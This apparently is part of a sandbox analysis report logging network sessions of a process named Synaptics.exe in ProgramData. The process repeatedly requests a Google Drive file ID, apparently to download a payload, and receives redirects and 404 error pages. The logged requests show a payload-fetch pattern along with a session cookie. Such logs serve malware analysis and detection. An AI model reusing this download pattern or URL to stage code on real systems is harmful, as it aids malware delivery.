                                                                                            2025-01-02 19:29:59 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:59 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 4d 67 67 6f 33 54 63 32 52 6f 6b 70 4d 6a 66 71 48 34 64 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="rMggo3Tc2RokpMjfqH4d1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:59 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            72192.168.2.950033172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:59 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-yJRp8PPnKH_WqNQhL2CE_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            73192.168.2.950044172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:00 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-a-gVLG8nFhPOsP2nsuhQCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            74192.168.2.950045216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC61AdjwDCE993Lec3LWWuh7DTHH5AnsnCy0WiazRtbFAwIaDnmULXSb95YO87J9u8Ad
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EyTL52QY_VYFb6mcynrYLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 72 57 33 4c 61 67 46 49 4f 6e 38 45 75 67 5a 75 34 65 69 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="crW3LagFIOn8EugZu4ei1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            75192.168.2.950046172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:00 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GlkyHO3LpMt6szIyKZUt9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            76192.168.2.950047216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:00 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6DNWYeiua8F-5OD5eGnunBxwdN1_poTRqPj2UEovtk1f43IRU2kWyu3OYn1bXIKhwc
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:00 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VW-hgiZNhPwGmRDuhl3LkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:00 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:00 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 4a 4a 44 50 63 35 38 39 34 4e 6e 64 34 61 71 64 65 76 7a 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="cJJDPc5894Nnd4aqdevzAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:00 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            77192.168.2.950064172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:01 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:02 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:02 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bzb8oXJyF4URmdBXk0GjBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            78192.168.2.950063172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:01 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:02 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:02 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-LT0i3vk_qp_Khxzng-3FZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            79192.168.2.950073216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:02 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC71aGBmOJh2YiWecIkVLzp0KQjq8v0MlQA2WTa5VajLPIDRZiuGP9B4KlIF12FsLJE43QeuZM0
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-zJBqW50ToEMMhKOCSZ5CTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
